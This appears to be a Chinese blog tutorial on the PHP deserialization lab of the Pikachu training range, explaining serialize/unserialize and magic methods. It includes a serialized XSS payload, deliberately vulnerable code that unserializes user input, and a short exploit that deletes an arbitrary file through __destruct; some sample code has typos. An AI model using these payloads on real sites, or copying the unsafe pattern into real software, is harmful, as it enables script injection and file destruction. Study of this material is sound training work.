十、pikachu之php反序列化

最新推荐文章于 2024-05-17 14:11:37 发布
最新推荐文章于 2024-05-17 14:11:37 发布
阅读量933 收藏 3
点赞数 1
分类专栏: pikachu 文章标签: php android 开发语言
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_55202378/article/details/132481061
版权

文章目录

1、php反序列化概述

  在理解这个漏洞前,首先搞清楚php中serialize()unserialize()这两个函数。

(1)序列化serialize():就是把一个对象变成可以传输的字符串。比如下面是一个对象:

    class S{
        public $test="pikachu";
    }
    $s=new S(); //创建一个对象
    serialize($s); //把这个对象进行序列化
    序列化后得到的结果是这个样子的:O:1:"S":1:{s:4:"test";s:7:"pikachu";}
    O:代表类
    1:代表类名字长度为一个字符
    S:类的名称
    1:代表类里面有一个变量
    s:数据类型
    4:变量名称的长度
    test:变量名称
    s:数据类型
    7:变量值的长度
    pikachu:变量值

(2)反序列化unserialize():就是把被序列化的字符串还原为对象,然后在接下来的代码中继续使用。

$u=unserialize("O":1:"S":1:{s:4:"test";s:7:"pikachu";});
echo $u->test; //得到的结果为pikachu

  序列化和反序列化本身没有问题,但是如果反序列化的内容是用户可以控制的,且后台不正当的使用了PHP中的魔法函数,就会导致安全问题。
漏洞举例:

class S{
	var $test = "pikachu";
	function __destruct(){
		echo $this->test;
    }
}
$s = $_GET['test'];
@$unser = unserialize($a);

payload:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

2、实战

(1)使用payload:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

在这里插入图片描述

(2)查看源码;

<?php
/**
 * Created by runner.han
 * There is nothing new under the sun
 */

$SELF_PAGE = substr($_SERVER['PHP_SELF'],strrpos($_SERVER['PHP_SELF'],'/')+1);

if ($SELF_PAGE = "unser.php"){
    $ACTIVE = array('','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','active open','','active','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','','');
}

$PIKA_ROOT_DIR =  "../../";
include_once $PIKA_ROOT_DIR.'header.php';

class S{
    var $test = "pikachu";
    function __construct(){       
        echo $this->test;      
    }
}
$html='';
if(isset($_POST['o'])){
    $s = $_POST['o'];
    if(!@$unser = unserialize($s)){
        $html.="<p>大兄弟,来点劲爆点儿的!</p>";
    }else{
        $html.="<p>{$unser->test}</p>";       
    }
}
?>

  源码分析:简单来说,我们传入成功的反序列化字符串s,就会执行到else里面对其进行打印输出。

(3)构造反序列化payload。

<?php
class S{
    var $test = "pikachu";
}
$f = new S();
$payload = "<script>alert(1)</script>";
$f->test=$payload;
echo serialize($f);
?>

  上述代码:f实例化S类,然后重写类中的S,再对对象f进行序列化;序列化结果:O:1:"S":1:{s:4:"test";s:29:"<script>alert('xss')</script>";}

(3)执行payload。

在这里插入图片描述

(4)分析
  页面会弹框的主要原因是$html.="<p>{$unser->test}</p>"; 。而不是__construct()函数,因为在unserialize()时是不会自动调用。

在这里插入图片描述
  可以看到{$unser->test}的的结果就是<script>alert('xss')</script>

3、关于Magic function

  常见的几个魔法函数:

  • __construct()当一个对象创建时被调用,但在unserialize()时是不会自动调用的(构造函数)
  • __destruct()当一个对象销毁时被调用
  • __toString()当一个对象被当作一个字符串使用
  • __sleep()在对象在被序列化之前运行
  • __wakeup将在序列化之后立即被调用
<?php 
class people{
	public $name = "f1r3K0";
	public $age = '18';
	function __wakeup(){
		echo "__wakeup()";
	}
	function __construct(){
		echo "__consrtuct()";
	}
	function __destruct(){
		echo "__destruct()";
	}
	function __toString(){
		echo "__toString";
	}
	/*function __sleep(){
		echo "__sleep";
	}*/
}
$class =  new people();
$class_ser = serialize($class);
print_r($class_ser);
$class_unser = unserialize($class_ser);
print_r($class_unser);
?>

运行结果如下:
在这里插入图片描述
  从运行结果来看,我们可以看出unserialize函数是优先调用__wakeup()再进行的反序列化字符串。同时,对于其他方法的调用顺序也一目了然了。(注意:这里将sleep注释掉了,因为sleep会在序列化的时候调用,因此执行sleep方法就不会再执行序列以及之后的操作了。)

4、__wakeup()和destruct()

  unserialize()后会导致wakeup() destruct()的直接调用,中间无需其他过程。因此最理想的情况就是一些漏洞/危害代码在wakeup()destruct()中,从而当我们控制序列化字符串时可以去直接触发它们。我们这里直接使用参考文章的例子,代码如下:

//logfile.php删除临时日志文件<?php
class LogFile {
	//log文件名
	public $filename = 'error.log';
	//存储日志文件
	public function LogData($text) {
		echo 'Log some data:' . $text . '<br />';
		file_put_contents($this->filename,$text,FILE_APPEND);
	}
	//Destructor删除日志文件
	public function _destruct() {
		echo '_destruct delete' . $this->filename . 'file.<br />';
		unlink(dirname(_FILE_) . '/' . $this->filename);//删除当前目录下的filename这个文件
?>

<?php
//包含了'logfile.php'的主页面文件index.php<?php
include 'logfile.php';
class User {
	//属性
	public $age = o;
	public $name = '';
	//调用函数来输出类中属性
	public function PrintData() {
		echo 'User' . $this->name . 'is' . $this->age . 'years old.<br />';}
}
$usr = unserialize($_GET['user']);
?>

  index.php是一个有php序列化漏洞的主要文件,logfile.php的功能就是在临时日志文件被记录了之后调用 __destruct方法来删除临时日志的一个php文件。

  利用这个漏洞的方式就是,通过构造能够删除source.txt的序列化字符串,然后get方式传入被反序列化函数,反序列化为对象,对象销毁后调用__destruct()来删除source.txt

漏洞利用EXP:

<?php
	include 'logfile.php';
	$obj = new LogFile();
	$obj->filename = 'source.txt'; //source.txt为你想删除的文件
	echo serialize($obj) . '<br /> ;
?>

  通过['GET']传入序列化字符串,调用反序列化函数来删除想要删除的文件。如图:

在这里插入图片描述

PT_silver
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
135-PHP、Apache环境中部署pikachu
10-22
PHP、Apache 环境中部署 pikachu 说明 ...通过安装 phpstudy、下载和解压 pikachu、添加网站和配置 Apache、初始化数据库等步骤,可以成功部署 pikachupikachu 的使用需要配置数据库和初始化,才能正常使用。
pikachu LINUX安装包,
07-14
上传到根目录,解压直接就问访问,里面有教程
pikachu_php反序列化
qq_58683895的博客
11-22 451
unser->test源码可见,需要执行到test,那么就需要执行construct函数,该魔法函数创建对象时就会被执行,执行到else分支之后输入值的反序列化就会当做值给test调用。
pikachu反序列化
莫黎小天
06-29 533
1 .序列化 对象转换成字符串 持久保存 网络传输 例如: class S{ public $test=“pikachu”; } s=newS();//创建一个对象serialize(s=new S(); //创建一个对象 serialize(s=newS();//创建一个对象serialize(s); //把这个对象进行序列化 序列化后得到的结果是这个样子的:O:1:“S”:1:{s:4:“test”;s:7:“pikachu”;} O:代表object 1:代表对象名字长度为一个字符 S:对象的
Pikachu 靶场 PHP 反序列化漏洞通关解析
最新发布
Flag少侠的博客
05-17 2327
PHP反序列化漏洞是指在PHP应用程序中存在的安全漏洞,攻击者可以利用该漏洞通过精心构造的恶意序列化数据来执行恶意代码或实现未授权的操作。这种漏洞可能导致远程代码执行、敏感信息泄露、服务器拒绝服务等安全问题。PHP中的反序列化漏洞通常与序列化和反序列化功能相关。在PHP中,序列化是将对象或数据结构转换为可传输或存储的字符串的过程,而反序列化则是将这些字符串转换回原始对象或数据结构的过程。
pikachuphp反序列化()
weixin_54431413的博客
04-15 3038
pikachu靶场的反序列化漏洞 (代码审计能力有点弱鸡,不对之处请指教)
PHP反序列化
weixin_59762059的博客
06-21 2260
PHP反序列化
反序列化——pikachu
qq_43660551的博客
05-17 619
序列化:为了方便传输和存储数据,将要传输或者存储的对象进行序列化生成json对象,传到持久化服务器上。 反序列化:从内存中读取序列化后的json对象,将其转换为所需对象。 PHP序列化函数:serialize() 反序列化函数:unserialize() 看下源码:这里使用POST方式接收数据,并使用unserialize()函数对接收到的数据进行反序列化。 <?php /** * Created by runner.han * There is nothing new under t
Pikachu-----目录遍历/信息泄露/PHP反序列化/XXE/URL/SSRF
m0_65712192的博客
01-03 934
Pikachu-----目录遍历/信息泄露/PHP反序列化/XXE/URL/SSRF
反序列化漏洞+ThinkPHP例工具使用+shiro例工具使用
NSQ0207的博客
08-03 585
在url栏上输入O:4:"Flag":1:{s:4:"file";protected属性被序列化后属性名长度会增加3,因为属性名会变成%00*%00属性名。private属性被序列化后属性名会变成%00类名%00属性名。O代表对象 因为我们序列化的是一个对象 序列化数组则用A来表示。这个方法会在一个对象被当作字符串时被调用,于是我们就能看到下面。s:4:"name" 字符串 属性值长度 属性值。运行11.php文件,获得序列化后的值。在vulhub文件内找到shiro漏洞。
部署pikachu ppt资料
10-22
部署Pikachu PPT 资料需要安装PHP和Apache环境,下载和解压Pikachu靶场文件,修改配置文件,启动Apache和MySQL服务,访问Pikachu靶场,初始化数据库等步骤。通过这篇文章,读者可以了解Pikachu靶场的安装和配置过程...
pikachu-master
05-04
pikachu漏洞测试平台搭建
pikachu靶场全部通关.pdf
08-16
由于在有道云写的,不好发博客,只能这样子,个人结合B站视频,总结
反序列化漏洞靶场
leah126的博客
02-11 1650
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。此外,还将收集网上一些其他常用框架的反序列化链,对收录的所有反序列化链进行漏洞分析复现,并给出自己的 poc,以供参考。Laravel_5.4.0_9.3.6+_反序列化链_RCE1。
Pikachu靶场之PHP反序列化、XXE、URL重定向、SSRF漏洞
Jach1n
02-01 161
Pikachu靶场之PHP反序列化、XXE、URL重定向、SSRF漏洞
PHP反序列化(231119)
mo2901600657的博客
11-19 200
2023/11/19学习内容:php反序列化知识来源:橙子科技工作室。
pikachu反序列化
09-07
反序列化Pikachu对象,你需要使用适当的反序列化方法,通常是根据你使用的编程语言和框架来决定。以下是一个示例,在Python中使用pickle模块进行反序列化的代码: ```python import pickle # 反序列化Pikachu...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值